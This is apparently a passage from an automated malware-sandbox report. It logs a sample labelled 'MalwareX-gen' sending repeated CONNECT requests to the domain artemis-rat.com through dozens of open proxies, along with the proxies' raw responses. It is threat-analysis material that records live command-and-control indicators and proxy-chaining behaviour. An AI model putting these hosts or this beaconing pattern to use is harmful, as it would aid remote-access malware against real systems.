                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              982192.168.2.453192172.67.182.77807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.350534916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.505053997 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              983192.168.2.452244120.194.4.157827284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.360641956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.027137995 CET319INHTTP/1.1 400 Bad Request
                                              Server: openresty
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 170
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              984192.168.2.45312138.162.20.17331287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.364969969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.779520035 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              985192.168.2.45085437.44.238.2534717284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.368701935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.569298029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.569783926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:33.569781065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:45.569494009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:57.663172960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:09.663084030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              986192.168.2.450937201.71.2.2499997284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.368978977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.691859007 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              987192.168.2.45089151.158.108.134163797284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.369278908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.569297075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.569778919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:33.569861889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:45.569497108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:57.663163900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:09.663114071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:12.036046028 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                              Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              988192.168.2.45305058.234.116.19781977284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.381051064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              989192.168.2.452999185.167.59.215807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.392791033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:39:20.778673887 CET60INHTTP/1.0 200 Connection Established
                                              Proxy-agent: Apache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              990192.168.2.45300288.210.20.144200007284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.401463985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.987076044 CET202INHTTP/1.0 404 Not Found
                                              Content-Length: 717
                                              Content-Type: text/html
                                              Date: Tue, 30 Jan 2024 16:58:12 GMT
                                              Expires: Tue, 30 Jan 2024 16:58:12 GMT
                                              Server: Mikrotik HttpProxy
                                              Proxy-Connection: close


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              991192.168.2.45307851.89.173.40545707284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.411098003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.163125992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.163383961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.960803986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.554326057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.163501978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              992192.168.2.45317920.106.146.21250027284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.411608934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:33.605444908 CET38INHTTP/1.1 200 OK
                                              content-length: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              993192.168.2.45279547.229.171.15031287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.413352013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.553972006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.292345047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.757381916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:34.757332087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:49.997781038 CET39INHTTP/1.0 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              994192.168.2.453047128.199.202.1228080
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.423980951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.763376951 CET28INHTTP/1.1 400 Bad Request


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              995192.168.2.453018148.72.212.183450127284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.423980951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.256989956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.366777897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.570209980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.663578033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:33.757107973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:37.866830111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:46.069319010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:02.369445086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              996192.168.2.45099182.210.56.251807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.429861069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.435072899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.467382908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:33.508631945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:45.569480896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:57.585021019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:09.631855011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:33.631890059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              997192.168.2.450897128.199.196.31210497284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.439795971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.569639921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.569775105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:33.569859982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:45.569583893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:57.663163900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:09.663108110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
